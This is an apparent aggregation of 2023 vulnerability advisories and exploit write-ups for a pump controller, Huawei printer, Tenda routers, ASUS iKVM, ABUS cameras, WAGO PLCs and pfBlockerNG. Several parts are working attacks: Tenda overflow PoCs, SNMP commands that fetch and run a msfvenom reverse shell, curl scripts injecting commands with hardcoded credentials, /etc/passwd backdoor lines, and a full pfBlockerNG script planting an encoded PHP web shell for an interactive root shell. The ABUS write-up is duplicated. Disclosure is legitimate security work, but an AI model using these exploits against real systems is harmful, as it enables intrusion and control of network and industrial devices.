The controller suffers from an unauthenticated command injection vulnerability that allows system access with www-data permissions.

Title: Osprey Pump Controller 1.0.1 Unauthenticated Remote Code Execution Exploit  
Advisory ID: ZSL-2023-5754  
Type: Local/Remote  
Impact: System Access, DoS  
Risk: (5/5)  
Release Date: 27.02.2023

**Summary**

Providing pumping systems and automated controls for golf courses and turf irrigation, municipal water and sewer, biogas, agricultural, and industrial markets. Osprey: door-mounted, irrigation and landscape pump controller.

Technology hasn't changed dramatically on pump and electric motors in the last 30 years. Pump station controls are a different story. More than ever before, customers expect the smooth and efficient operation of VFD control. Communications—monitoring, remote control, and interfacing with irrigation computer programs—have become common requirements. Fast and reliable accessibility through cell phones has been a game changer.

ProPump & Controls can handle any of your retrofit needs, from upgrading an older relay logic system to a powerful modern PLC controller, to converting your fixed speed or first generation VFD control system to the latest control platform with communications capabilities.

We use a variety of solutions, from MCI-Flowtronex and Watertronics package panels to sophisticated SCADA systems capable of controlling and monitoring networks of hundreds of pump stations, valves, tanks, deep wells, or remote flow meters.

User friendly system navigation allows quick and easy access to all critical pump station information with no password protection unless requested by the customer. Easy to understand control terminology allows any qualified pump technician the ability to make basic changes without support. Similar control and navigation platform compared to one of the most recognized golf pump station control systems for the last twenty years make it familiar to established golf service groups nationwide. Reliable push button navigation and LCD information screen allows the use of all existing control panel door switches to eliminate the common problems associated with touchscreens.

Global system configuration possibilities allow it to be adapted to virtually any PLC or relay logic controlled pump stations being used in the industrial, municipal, agricultural and golf markets that operate variable or fixed speed. On board Wi-Fi and available cellular modem option allows complete remote access.

**Description**

The controller suffers from an unauthenticated command injection vulnerability that allows system access with www-data permissions.

**Vendor**

ProPump and Controls, Inc. - https://www.propumpservice.com | https://www.pumpstationparts.com

**Affected Version**

Software Build ID 20211018, Production 10/18/2021  
Mirage App: MirageAppManager, Release \[1.0.1\]  
Mirage Model 1, RetroBoard II

**Tested On**

Apache/2.4.25 (Raspbian)  
Raspbian GNU/Linux 9 (stretch)  
GNU/Linux 4.14.79-v7+ (armv7l)  
Python 2.7.13 \[GCC 6.3.0 20170516\]  
GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git  
PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)

**Vendor Status**

\[05.01.2023\] Vulnerabilities discovered.  
\[07.01.2023\] Vendor contacted.  
\[09.01.2023\] No response from the vendor.  
\[10.01.2023\] Vendor contacted.  
\[10.01.2023\] CISA contacted through CVD.  
\[10.01.2023\] Submitted to VINCE.  
\[12.01.2023\] CISA/VINCE asked for more details.  
\[13.01.2023\] Provided PoCs to CISA.  
\[13.01.2023\] Provided PoCs to VINCE and discovered XSS in VINCE.  
\[26.01.2023\] No response from VINCE.  
\[26.01.2023\] CISA closes incident: INC000010422052. NCISS Score: Baseline - Negligible (White). A Baseline–Negligible priority incident is an incident that is highly unlikely to affect public health or safety, national security, economic security, foreign relations, civil liberties, or public confidence. No further actions required by CISA.  
\[26.02.2023\] No response from the vendor.  
\[27.02.2023\] Public security advisory released.

**PoC**

ospreypump\_rce.py

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

\[1\] https://www.cisa.gov/news-events/news/cisa-national-cyber-incident-scoring-system-nciss

**Changelog**

\[27.02.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Osprey Pump Controller 1.0.1 Unauthenticated Remote Code Execution Exploit

There is a system command injection vulnerability in BiSheng-WNM FW 3.0.0.325. A Huawei printer has a system command injection vulnerability. Successful exploitation could lead to remote code execution.

*   SA No:huawei-sa-SCIViaHPP-f18e962a
*   Initial Release Date: 2023-01-18
*   Last Release Date: 2023-01-18

  

A Huawei printer has a system command injection vulnerability. Successful exploitation could lead to remote code execution.(Vulnerability ID:HWPSIRT-2022-90114)

This vulnerability has been assigned a (CVE)ID:CVE-2022-48255

  

Affected Product

Affected Version

Repair Version

BiSheng-WNM

BiSheng-WNM FW 3.0.0.325

BiSheng-WNM FW 3.0.0.327

  

HWPSIRT-2022-90114:

Successful exploitation could lead to remote code execution.

  

Vulnerabilities are scored base on the CVSS v3.1 scoring system. For details please refer to: http://www.first.org/cvss/specification-document.

HWPSIRT-2022-90114

Base Score: 9.8

Temporary Score: 9.1

Environmental Score: NA

CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C

  

HWPSIRT-2022-90114:

This vulnerability can be exploited only when the following conditions are present:

An attacker can access devices through the network.

Technical details:

A Huawei printer product has a system command injection vulnerability. This vulnerability is caused by improper filtering of special characters in external input. Unauthorized attackers can exploit this vulnerability by constructing malicious external input. Successful exploitation could lead to remote code execution.

  

The product that supports automatic update will receive a system update prompt. You can install the update to fix the vulnerability.  

HWPSIRT-2022-90114:

This vulnerability was discovered by Huawei internal tester.

  

2023-01-18 V1.0 Initial Release

  

Huawei adheres to protecting the ultimate interests of users with best efforts and the principle of responsible disclosure and deal with product security issues through our response mechanism.

To enjoy Huawei PSIRT services and obtain Huawei product vulnerability information, please visit http://www.huawei.com/en/psirt.

To report a security vulnerability in Huawei products and solutions, please send it to PSIRT@huawei.com. For details, please visit http://www.huawei.com/en/psirt/report-vulnerabilities.

This document is provided on an "AS IS" basis and does not imply any kind of guarantee or warranty, either express or implied, including the warranties of merchantability or fitness for a particular purpose. In no event shall Huawei or any of its directly or indirectly controlled subsidiaries or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. Your use of the document, by whatsoever means, will be totally at your own risk. Huawei is entitled to amend or update this document from time to time.

CVE-2022-48255: Security Advisory - System Command Injection Vulnerability in a Huawei Printer Product

Tenda Router W30E V1.0.1.25(633) is vulnerable to Buffer Overflow in function fromRouteStatic via parameters entrys and mitInterface.

**Tenda Router W30E Vulnerability**

This vulnerability lies in the /goform/RouteStatic page which influences the lastest version of Tenda Router W30E. (The latest version is W30E\_V1.0.1.25(633))

**Vulnerability Description**

There is a stack-based buffer overflow vulnerability in function fromRouteStatic.

In function fromRouteStatic it reads 2 user provided parameters entrys and mitInterface into v8 and v7, and these two variables are passed into function sprintf without any length check, which may overflow the stack-based buffer s. 

So by requesting the page /goform/RouteStatic, the attacker can easily perform a **Deny of Service Attack** or **Remote Code Execution** with carefully crafted overflow data.

**POC**

    import requests
    
    IP = "10.10.10.1"
    url = f"http://{IP}/goform/RouteStatic?"
    url += "entrys=" + "s" * 0x200
    url += "&mitInterface=" + "a" * 0x200
    
    response = requests.get(url)
    

**Timeline**

2023-01-30: Report to CVE;

**Acknowledgment**

Credit to @Funcy\_kilar from Guangzhou University.

CVE-2023-25231: Vluninfo_Repo/CNVDs/104 at main · Funcy33/Vluninfo_Repo

Tenda AC500 V2.0.1.9(1307) is vulnerable to Buffer Overflow in function fromRouteStatic via parameters entrys and mitInterface.

**Tenda AC500 Vulnerability**

This vulnerability lies in the /goform/RouteStatic page which influences the lastest version of Tenda AC500. (The latest version is AC500\_V2.0.1.9(1307))

**Vulnerability Description**

There is a stack-based buffer overflow vulnerability in function fromRouteStatic.

In function fromRouteStatic it reads 2 user provided parameters entrys and mitInterface into v8 and v7, and these two variables are passed into function sprintf without any length check, which may overflow the stack-based buffer s. 

So by requesting the page /goform/RouteStatic, the attacker can easily perform a **Deny of Service Attack** or **Remote Code Execution** with carefully crafted overflow data.

**POC**

    import requests
    
    IP = "10.10.10.1"
    url = f"http://{IP}/goform/RouteStatic?"
    url += "entrys=" + "s" * 0x200
    url += "&mitInterface=" + "a" * 0x200
    
    response = requests.get(url)
    

**Timeline****Acknowledgment**

Credit to @Funcy\_kilar from Guangzhou University.

CVE-2023-25233: Vluninfo_Repo/CNVDs/113 at main · Funcy33/Vluninfo_Repo

Tenda AC500 V2.0.1.9(1307) is vulnerable to Buffer Overflow in function fromAddressNat via parameters entrys and mitInterface.

**Tenda Router AC500 Vulnerability**

This vulnerability lies in the /goform/addressNat page which influences the lastest version of Tenda Router AC500. (The latest version is AC500\_V2.0.1.9(1307))

**Vulnerability Description**

There is a stack-based buffer overflow vulnerability in function fromAddressNat.

In function fromAddressNat it reads 2 user provided parameters entrys and mitInterface into v8 and v7, and these two variables are passed into function sprintf without any length check, which may overflow the stack-based buffer s. 

So by requesting the page /goform/addressNat, the attacker can easily perform a **Deny of Service Attack** or **Remote Code Execution** with carefully crafted overflow data.

**POC**

    import requests
    
    IP = "10.10.10.1"
    url = f"http://{IP}/goform/addressNat?"
    url += "entrys=" + "s" * 0x200
    url += "&mitInterface=" + "a" * 0x200
    
    response = requests.get(url)
    

**Timeline****Acknowledgment**

Credit to @Funcy\_kilar from Guangzhou University.

CVE-2023-25234: Vluninfo_Repo/CNVDs/113_1 at main · Funcy33/Vluninfo_Repo

ASUS ASMB8 iKVM firmware versions 1.14.51 and below suffers from a flaw where SNMPv2 can be used with write access to introduce arbitrary extensions to achieve remote code execution as root. The researchers also discovered a hardcoded administrative account.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
# Exploit Title:        ASUS ASMB8 iKVM RCE and SSH Root Access  
# Date:                 2023-02-16  
# Exploit Author:       d1g@segfault.net for NetworkSEC [NWSSA-002-2023]  
# Vendor Homepage:      https://servers.asus.com/search?q=ASMB8  
# Version/Model:        ASMB8 iKVM Firmware <= 1.14.51 (probably others)  
# Tested on:            Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl  
# CVE:                  CVE-2023-26602  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

++++++++++++++++++++  
0x00    DESCRIPTION  
++++++++++++++++++++

During a recent engagement, a remote server management interface has been   
discovered. Furthermore, SNMPv2 was found to be enabled, offering write  
access to the private community, subsequently allowing us to introduce  
SNMP arbitrary extensions to achieve RCE.

We also found a hardcoded account sysadmin:superuser by cracking the   
shadow file (md5crypt) found on the system and identifed an "anonymous"  
user w/ the same password, however a lock seems to be in place to prevent  
using these credentials via SSH (running defshell as default shell).

+++++++++++++++  
0x01    IMPACT  
+++++++++++++++

By exploiting SNMP arbitrary extension, we are able to run any command on  
the system w/ root privileges, and we are able to introduce our own user  
circumventing the defshell restriction for SSH.

+++++++++++++++++++++++++++++++  
0x02    PROOF OF CONCEPT (PoC)  
+++++++++++++++++++++++++++++++

At first, we have to create required extensions on the system, e.g. via

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "[command]"'

and if everything is set, we can just run that command by

snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects

which will execute our defined command and show us its output.

+++++++++++++++++++++++++++++++  
0x03    SSH Remote Root Access  
+++++++++++++++++++++++++++++++

The identified RCE can be used to transfer a reverse tcp shell created  
by msfvenom for arm little-endian, e.g.

msfvenom -p linux/armle/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin

We can now transfer the binary, adjust permissions and finally run it:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"'  
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"'  
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"'

Again, we have to request execution of the lines in the MIB via:

snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects

We get a reverse connection from the host, and can now act on the local system   
to easily echo our own line into /etc/passwd:

echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd

By setting the standard shell to /bin/sh, we are able to get a SSH root  
shell into the system, effectively circumventing the defshell restriction.

$ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g

BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash)  
Enter 'help' for a list of built-in commands.

# uname -a  
Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown  
# uptime  
 15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25  
# head -n 1 /etc/shadow  
sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7:::

---

#EOF

ASUS ASMB8 iKVM 1.14.51 SNMP Remote Root

ABUS Security Camera version TVIP 20000-21150 suffers from local file inclusion, hardcoded credential, and command injection vulnerabilities. When coupled together, they can be leveraged to achieve remote access as root via ssh.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
# Exploit Title:  ABUS Security Camera LFI, RCE and SSH Root Access  
# Date:      2023-02-16  
# Exploit Author:  d1g@segfault.net for NetworkSEC [NWSSA-001-2023]  
# Vendor Homepage:  https://www.abus.com  
# Version/Model:  TVIP 20000-21150 (probably many others)  
# Tested on:    GM ARM Linux 2.6, Server: Boa/0.94.14rc21  
# CVE:      CVE-2023-26609  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

++++++++++++++++++++  
0x00  DESCRIPTION  
++++++++++++++++++++

During a recent engagement, a network camera was discovered. Web fuzzing   
revealed a URL of

/device

containing output about running processes as well as a pretty complete   
listing of webcontent which inevitably arose our suspicion.

More research revealed that files w/ known LFI and RCE issues were present,   
leading to either arbitrary file reads or remote code execution, both w/   
root privileges and using known default credentials (either admin:admin   
or manufacture:erutcafunam).

After closer filesystem inspection, RCE led to a remote root SSH shell.

+++++++++++++++  
0x01  IMPACT  
+++++++++++++++

The LFI vulnerability can be exploited using a URL of:

/cgi-bin/admin/fileread?READ.filePath=[filename]

and is able to read any file on the system.

The RCE vulnerability originates from a command injection and may be   
exploited by calling a URL of:

/cgi-bin/mft/wireless_mft?ap=irrelevant;[command]

(as classy as it can get, we can also use the pipe "|" instead, and  
linefeed a.k.a. "%0a" works as well)

effectively giving us remote code (or rather command) execution.

+++++++++++++++++++++++++++++++  
0x02   PROOF OF CONCEPT (PoC)  
+++++++++++++++++++++++++++++++

#!/bin/bash  
#  
# ABUS Security Camera LFI  
#  
curl -iv "http://admin:admin@a.b.c.d/cgi-bin/admin/fileread?READ.filePath=/$1"

The script can be called like:

./LFI.sh /etc/passwd

to display the contents of the passwd file. When reading the configuration of  
the BOA server (/etc/boa.conf), we find hardcoded credentials:

# MFT: Specify manufacture commands user name and password  
MFT manufacture erutcafunam 

These can now be used to execute the RCE (based on command injection):

#!/bin/bash  
#  
# ABUS Security Camera RCE  
#  
curl -iv "http://manufacture:erutcafunam@a.b.c.d/cgi-bin/mft/wireless_mft?ap=testname;$1"

and can be called like:

./LFI.sh id

to display a user id of 

uid=0(root) gid=0(root)

+++++++++++++++++++++++++++++++  
0x03  SSH Remote Root Access  
+++++++++++++++++++++++++++++++

After having discovered the previously described vulnerabilities, multiple   
attempts to spawn a nice reverse shell failed as the system was minimal   
and did neither offer binaries like bash or netcat, nor any compilers or   
scripting language interpreters to execute our code. Furthermore, binaries   
that we transferred onto the system (for ARM little-endian architecture)   
either resulted in "Segmentation fault" (mfsvenom) or as we saw later  
"Illegal instruction" (netcat for ARM).

We had to inspect the local attack surface and use the LOLBIN approach,  
a.k.a. living off the land binaries available on the system. 

In this case, the minimal and often busybox-included dropbear SSH daemon   
became pretty handy. 

To successfully implement a remote root SSH shell for persistance, several   
steps had to be undertaken:

1) First, we had to create a valid SSH keyset by reusing our RCE.sh skript:

./RCE.sh "/etc/dropbear/dropbearkey%20-t%20rsa%20-f%20/etc/dropbear/dropbear_rsa_host_key"

2) Then, add our user to the password file, e.g.:

./RCE.sh "echo%20d1g:OmE2EUpLJafIk:0:0:root:/:/bin/sh%20>>%20/etc/passwd"

3) Finally, start the server:

./RCE.sh "/etc/dropbear/dropbear%20-E%20-F"

We can now SSH (using obsolete and insecure algorithms for both KeyExchange and HostKey)   
into our rootshell:

sshpass -p XXXXXXX ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa d1g@x.x.x.x

Welcome to

    _____    __      ___       __     ___       _     _    _  
   |  ___|  /  \    / __ \    /  \   |  _ \    /  \   \ \ / /  
   | |___  / /\ \  | /__\ \  / /\ \  | | \ |  / /\ \   \ V /  
   |  ___|| |__| | |  _   / | |__| | | | | | | |__| |   \ /  
   | |    |  __  | | |  \ \ |  __  | | |_/ / |  __  |   | |  
   |_|    |_|  |_| |_|   \_\|_|  |_| |___ /  |_|  |_|   |_|

For further information check:  
http://www.GM.com/

BusyBox v1.1.3 (2012.07.16-03:58+0000) Built-in shell (ash)  
Enter 'help' for a list of built-in commands.

[d1g]# id  
uid=0(root) gid=0(root)

---

#EOF

ABUS Security Camera TVIP 20000-21150 LFI / Remote Code Execution

A CORS Misconfiguration in the web-based management allows a malicious third party webserver to misuse all basic information pages on the webserver. In combination with CVE-2022-45138 this could lead to disclosure of device information like CPU diagnostics. As there is just a limited amount of information readable the impact only affects a small subset of confidentiality.

2023-02-27 12:00 (CET) VDE-2022-060  

**WAGO: Multiple vulnerabilities in web-based management of multiple products**  
Share: Email | Twitter  

**

Published

**

2023-02-27 12:00 (CET)

**

Last update

**

2023-02-27 15:35 (CET)

**Vendor(s)**

WAGO GmbH & Co. KG  

**Product(s)**

Article No°

Product Name

Affected Version(s)

751-9301

Compact Controller CC100

FW16 <= FW22

751-9301

Compact Controller CC100

\= FW23

752-8303/8000-002

Edge Controller

\= FW23

752-8303/8000-002

Edge Controller

FW18 <= FW22

750-81xx/xxx-xxx

PFC100

FW16 <= FW22

750-81xx/xxx-xxx

PFC100

\= FW23

750-82xx/xxx-xxx

PFC200

FW16 <= FW22

750-82xx/xxx-xxx

PFC200

\= FW23

762-5xxx

Touch Panel 600 Advanced Line

FW16 <= FW22

762-5xxx

Touch Panel 600 Advanced Line

\= FW23

762-6xxx

Touch Panel 600 Marine Line

FW16 <= FW22

762-6xxx

Touch Panel 600 Marine Line

\= FW23

762-4xxx

Touch Panel 600 Standard Line

FW16 <= FW22

762-4xxx

Touch Panel 600 Standard Line

\= FW23

**

Summary

**

The Web-Based Management (WBM) of WAGOs programmable logic controller (PLC) is typically used for administration, commissioning and updates.

The configuration backend can in some cases be used without authentication and to write data with root privileges. Additionally, the web-based management suffers a CORS misconfiguration and allows reflected XSS (Cross-Site Scripting) attacks.

**

Vulnerabilities

**

**Last Update**

Feb. 13, 2023, 4:24 p.m.

**Weakness**

Missing Authentication for Critical Function (CWE-306)

**Summary**

_The configuration backend of the web-based management can be used by unauthenticated users, although only authenticated users should be able to use the API. The vulnerability allows an unauthenticated attacker to read and set several device parameters that can lead to full compromise of the device._

**Last Update**

Feb. 13, 2023, 4:25 p.m.

**Weakness**

Missing Authentication for Critical Function (CWE-306)

**Summary**

_The configuration backend allows an unauthenticated user to write arbitrary data with root privileges to the storage, which could lead to unauthenticated remote code execution and full system compromise._

**Last Update**

Feb. 13, 2023, 4:24 p.m.

**Weakness**

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)

**Summary**

_The configuration backend of the web-based management is vulnerable to reflected XSS (Cross-Site Scripting) attacks that targets the users browser. This leads to a limited impact of confidentiality and integrity but no impact of availability._

**Last Update**

Feb. 13, 2023, 4:24 p.m.

**Summary**

_A CORS Misconfiguration in the web-based management allows a malicious third party webserver to misuse all basic information pages on the webserver. In combination with CVE-2022-45138 this could lead to disclosure of device information like CPU diagnostics. As there is just a limited amount of information readable the impact only affects a small subset of confidentiality._

**

Impact

**

The web-based management of affected products is vulnerable to Reflective Cross-Site Scripting. This can be used to install malicious code and to gain access to confidential information on a System that connects to the WBM after it has been compromised.

Additionally, the web-based management of affected products is vulnerable to stealing and setting device parameters and remote code execution by an unauthenticated attacker.

**

Solution

**

**Mitigation**

*   If not needed, you can deactivate the web-based management to prevent attacks (command line)
*   Restrict network access to the device.
*   Do not directly connect the device to the internet

**Remediation**

We recommend all users of affected products to install FW22 Patch 1 or FW 24 or higher.

**

Reported by

**

These vulnerabilities were reported to WAGO by Ryan Pickren from Georgia Institute of Technology's Cyber-Physical Security Lab  
Coordination done by CERT@VDE.

CVE-2022-45139: VDE-2022-060 | CERT@VDE

pfBlockerNG version 2.1.4_26 remote code execution exploit.

    # Exploit Title: pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)# Shodan Results: https://www.shodan.io/search?query=http.title%3A%22pfSense+-+Login%22+%22Server%3A+nginx%22+%22Set-Cookie%3A+PHPSESSID%3D%22# Date: 5th of September 2022# Exploit Author: IHTeam# Vendor Homepage: https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html# Software Link: https://github.com/pfsense/FreeBSD-ports/pull/1169# Version: 2.1.4_26# Tested on: pfSense 2.6.0# CVE : CVE-2022-31814# Original Advisory: https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/ #!/usr/bin/env python3import argparseimport requestsimport timeimport sysimport urllib.parsefrom requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) parser = argparse.ArgumentParser(description="pfBlockerNG <= 2.1.4_26 Unauth RCE")parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: https://192.168.1.111:443/")args = parser.parse_args() url = args.urlshell_filename = "system_advanced_control.php" def check_endpoint(url):  response = requests.get('%s/pfblockerng/www/index.php' % (url), verify=False)  if response.status_code == 200:    print("[+] pfBlockerNG is installed")  else:    print("\n[-] pfBlockerNG not installed")    sys.exit() def upload_shell(url, shell_filename):  payload = {"Host":"' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"}  print("[/] Uploading shell...")  response = requests.get('%s/pfblockerng/www/index.php' % (url), headers=payload, verify=False)  time.sleep(2)  response = requests.get('%s/system_advanced_control.php?c=id' % (url), verify=False)  if ('uid=0(root) gid=0(wheel)' in str(response.content, 'utf-8')):    print("[+] Upload succeeded")  else:    print("\n[-] Error uploading shell. Probably patched ", response.content)    sys.exit() def interactive_shell(url, shell_filename, cmd):  response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(cmd, safe='')), verify=False)  print(str(response.text)+"\n")  def delete_shell(url, shell_filename):  delcmd = "rm /usr/local/www/system_advanced_control.php"  response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(delcmd, safe='')), verify=False)  print("\n[+] Shell deleted") check_endpoint(url)upload_shell(url, shell_filename)try:  while True:    cmd = input("# ")    interactive_shell(url, shell_filename, cmd)except:  delete_shell(url, shell_filename)

pfBlockerNG 2.1.4_26 Remote Code Execution

ABUS TVIP 20000-21150 devices allows remote attackers to execute arbitrary code via shell metacharacters in the /cgi-bin/mft/wireless_mft ap field.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Exploit Title: ABUS Security Camera LFI, RCE and SSH Root Access # Date: 2023-02-16 # Exploit Author: d1g@segfault.net for NetworkSEC \[NWSSA-001-2023\] # Vendor Homepage: https://www.abus.com # Version/Model: TVIP 20000-21150 (probably many others) # Tested on: GM ARM Linux 2.6, Server: Boa/0.94.14rc21 # CVE: Currently Unassigned (CVE-2023-XXXXX) ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++ 0x00 DESCRIPTION ++++++++++++++++++++ During a recent engagement, a network camera was discovered. Web fuzzing revealed a URL of /device containing output about running processes as well as a pretty complete listing of webcontent which inevitably arose our suspicion. More research revealed that files w/ known LFI and RCE issues were present, leading to either arbitrary file reads or remote code execution, both w/ root privileges and using known default credentials (either admin:admin or manufacture:erutcafunam). After closer filesystem inspection, RCE led to a remote root SSH shell. +++++++++++++++ 0x01 IMPACT +++++++++++++++ The LFI vulnerability can be exploited using a URL of: /cgi-bin/admin/fileread?READ.filePath=\[filename\] and is able to read any file on the system. The RCE vulnerability originates from a command injection and may be exploited by calling a URL of: /cgi-bin/mft/wireless\_mft?ap=irrelevant;\[command\] (as classy as it can get, we can also use the pipe "|" instead, and linefeed a.k.a. "%0a" works as well) effectively giving us remote code (or rather command) execution. +++++++++++++++++++++++++++++++ 0x02 PROOF OF CONCEPT (PoC) +++++++++++++++++++++++++++++++ #!/bin/bash # # ABUS Security Camera LFI # curl -iv "http://admin:admin@a.b.c.d/cgi-bin/admin/fileread?READ.filePath=/$1" The script can be called like: ./LFI.sh /etc/passwd to display the contents of the passwd file. When reading the configuration of the BOA server (/etc/boa.conf), we find hardcoded credentials: # MFT: Specify manufacture commands user name and password MFT manufacture erutcafunam These can now be used to execute the RCE (based on command injection): #!/bin/bash # # ABUS Security Camera RCE # curl -iv "http://manufacture:erutcafunam@a.b.c.d/cgi-bin/mft/wireless\_mft?ap=testname;$1" and can be called like: ./LFI.sh id to display a user id of uid=0(root) gid=0(root) +++++++++++++++++++++++++++++++ 0x03 SSH Remote Root Access +++++++++++++++++++++++++++++++ After having discovered the previously described vulnerabilities, multiple attempts to spawn a nice reverse shell failed as the system was minimal and did neither offer binaries like bash or netcat, nor any compilers or scripting language interpreters to execute our code. Furthermore, binaries that we transferred onto the system (for ARM little-endian architecture) either resulted in "Segmentation fault" (mfsvenom) or as we saw later "Illegal instruction" (netcat for ARM). We had to inspect the local attack surface and use the LOLBIN approach, a.k.a. living off the land binaries available on the system. In this case, the minimal and often busybox-included dropbear SSH daemon became pretty handy. To successfully implement a remote root SSH shell for persistance, several steps had to be undertaken: 1) First, we had to create a valid SSH keyset by reusing our RCE.sh skript: ./RCE.sh "/etc/dropbear/dropbearkey%20-t%20rsa%20-f%20/etc/dropbear/dropbear\_rsa\_host\_key" 2) Then, add our user to the password file, e.g.: ./RCE.sh "echo%20d1g:OmE2EUpLJafIk:0:0:root:/:/bin/sh%20>>%20/etc/passwd" 3) Finally, start the server: ./RCE.sh "/etc/dropbear/dropbear%20-E%20-F" We can now SSH (using obsolete and insecure algorithms for both KeyExchange and HostKey) into our rootshell: sshpass -p XXXXXXX ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa d1g@x.x.x.x Welcome to \_\_\_\_\_ \_\_ \_\_\_ \_\_ \_\_\_ \_ \_ \_ | \_\_\_| / \\ / \_\_ \\ / \\ | \_ \\ / \\ \\ \\ / / | |\_\_\_ / /\\ \\ | /\_\_\\ \\ / /\\ \\ | | \\ | / /\\ \\ \\ V / | \_\_\_|| |\_\_| | | \_ / | |\_\_| | | | | | | |\_\_| | \\ / | | | \_\_ | | | \\ \\ | \_\_ | | |\_/ / | \_\_ | | | |\_| |\_| |\_| |\_| \\\_\\|\_| |\_| |\_\_\_ / |\_| |\_| |\_| For further information check: http://www.GM.com/ BusyBox v1.1.3 (2012.07.16-03:58+0000) Built-in shell (ash) Enter 'help' for a list of built-in commands. \[d1g\]# id uid=0(root) gid=0(root) --- #EOF

Tag

#rce